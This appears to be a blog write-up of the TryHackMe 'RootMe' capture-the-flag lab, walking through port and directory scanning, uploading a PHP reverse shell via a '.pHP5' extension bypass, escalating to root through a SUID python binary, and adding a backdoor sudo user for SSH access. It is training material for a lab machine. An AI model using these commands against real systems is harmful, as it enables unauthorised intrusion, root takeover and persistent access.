top of page

TryHackMe - RootMe CTF



Hello guys, this blog post is about Cyber Security. While telling you about my RootMe CTF (Capture the Flag) experience on TryHackMe, I'll also show you how to hack a non-secure server by using web vulnerabilities.


I'll definitely use Kali Linux operating system involving the most important Pentest Tools and specialized for that when it comes to Cyber Security and Hacking. In this blog post, I'll show you many methods by using various tools in Kali. If you've seen the dragon above before, probably you know Kali. :)


TryHackMe, is a web site proposing virtual lab environments for users who want to work and improve in cyber security. Let me remind you that it's a useful site and you shouldn't use what you know about hacking for bad intentions in real life.


You can go to CTF by this link https://tryhackme.com/room/rrootme.


Now, let's set up the lab environment. Go to CTF and open Task 1. Click "Start Machine" and open the machine to be hacked.



As you see, when the machine is ready it gives us the IP info.



The machine is ready, we need to connect to VPN. To connect to VPN, click the question marked button and follow the "See Instruction" steps in the image. I won't mention those steps.



Upon completing the steps, you need to download the .ovpn extension file that is unique for you. Connect to VPN network by this file.

# openvpn <YOUR_FILE>.ovpn

Those who want to try and work on CTF by themselves may quit the blog post. Since I've solved it before, you'll see the answers.



Upon connecting to the VPN network, we can go on to Task 2. Purpose of Task 2 is reconnaissance. In this step, we're expected to start the reconnaissance by scanning the open ports in the server of which we just know the IP.



Go to terminal screen and ping the target server. We can communicate with the target since ping is gone. If we had trouble connecting to VPN network, we wouldn't see the ping gone. To scan the open ports, we'll use Nmap tool. We'll quickly scan the known ports with -F option of Nmap tool. We've seen that 22/SSH and 80/HTTP ports are open upon scanning.

# ping <HEDEF_IP>
# nmap <HEDEF_IP> -F


Upon seeing the HTTP port is open, we've entered the IP address on the scanner thinking it's an application server. After a rather meaningful welcome in the index page, we go back to the terminal.



For further information about the server, send Head Http request to the web page. Don't forget that the target server's Ubuntu and Apache version is 2.4.29.

# HEAD HTTP/1.1 <HEDEF_IP>


Now, we'll scan hidden pages of the web site. Install Gobuster tool to do that. Gobuster scans hidden pages and sub-directories for a web site with the given wordlist. You can see abilities of the tool with the "gobuster -h" command.

# apt-get install gobuster
# gobuster -h

Google it to find a useful wordlist for Gobuster.



I've found a useful wordlist. Don't forget, the longer the wordlist the longer the scanning takes. On the other hand, the shorter the wordlist the more the hidden pages you may oversee.

# git clone https://github.com/aels/subdirectories-discover
# cd subdirectories-discover


Gobuster found all hidden pages by scanning the wordlist 15 seconds after the attack started. Especially panel and uploads pages are important here.

# gobuster -u <HEDEF_IP> -w dsstorewordlist.txt dir


It seems that the panel page is an interface for the users to download various files to the site. If we can download a malware to the site through this interface, we can hack it.



And uploads page is probably designed to view the uploaded files.



All tasks of Task 2 in CTF page are completed. We'll handle Task 3 now.

We are asked to access "user.txt" file by shell scanning the server. What's important here is "file upload bypass" method, that is uploading the malware to the web site in some way. Another method is "PHP reverse shell", it helps getting reserve shell from the target server with tcp by using a malware in php language.



Google it for PHP reverse shell. We see an open-source software about it.



Upon downloading this source, open the php file to edit the code.

# git clone https://github.com/pentestmonkey/php-reverse-shell
# cd php-reverse-shell
# vi php-reverse-shell.php


We see the IP and port changeables we're asked to change. Purpose of the attack is to direct the shell in the target server to our server, that's why we enter our IP to IP changeable and a port not used in our server to port changeable.



Let's try to upload the malware php to the site.



We see an error message in Portuguese. We see that it's not allowed to upload PHP extension files. It's obvious that developers have strict security measures.

Now, we should search "file upload bypass" methods.



I've tried various methods to bypass this file uploading process. You may search for those methods on your own. I've tried upload it with different extensions like pHP, phP, Php, php5, pHP5 and seen the error message many times. I've run the nc command in an extra terminal to listen to the port I've gave to the software. That way, if the upload is successfully completed and we run the software, we'll catch the shell that'll turn to this port.

# nc -nvlp <YOUR_PORT>


Finally, one of my tryings is successful uploaded the .pHP5 extension file to the site successfully. Go to uploads page.



Uploaded file has come to uploads page successfully and click the .pHP5 extension file to run the code.



That’s it! As you see in the right terminal, we've caught the shell in the target server. Check who we're and what we're capable of in the server with basic commands.

$ whoami
$ id
$ ls -l


Try to find and read user.txt to catch the flag in Task 3.

$ find / -name user.txt 2>/dev/null
$ cat /var/www/user.txt


Now we're connected to the shell in the server but since we don't have sudos, we're still not capable of much. Go on to Task 4 which is the last part. Our purpose is to have sudos to be capable of more, that is being Root. Purpose of this task is to do "Privilege Escalation".



First thing to do in the hacked server is scanning SUID special permissions. Run the find command in both our and target server to see the files with SUID authorizations of the root user. Python file is important here which means you can run the python command for any user by using root authorizations in this server.

$ find -user root -perm /4000 2>/dev/null


Key word is "GTFObins" here. GTfobins is a compiled Unix binary file list used to skip local security restrictions in wrongly-configured systems.



We've found the python command we need with the help of GTFObins.



We've captured the root shell in the target server which we hacked with www-data user by using wrongly-configured pyhton command. Last flag dropped and now we're fully dominating this server.

$ which python
$ python -c 'import os; os.setuid(0); os.system("/bin/bash")'
whoami
find / -name root.txt 2>/dev/null
cat /root/root.txt


CTF is finished at this point. However, there is another manipulation called backdoor. Create a new user and grant sudo authorizations. We can connect ssh from our machine to the target machine directly and have sudos.

useradd system
passwd system
usermod -aG sudo system
# ssh system@<HEDEF_IP>


Final touch and my blog post ends here.

 

Hope to see you in new posts,

Take care.

199 views0 comments
bottom of page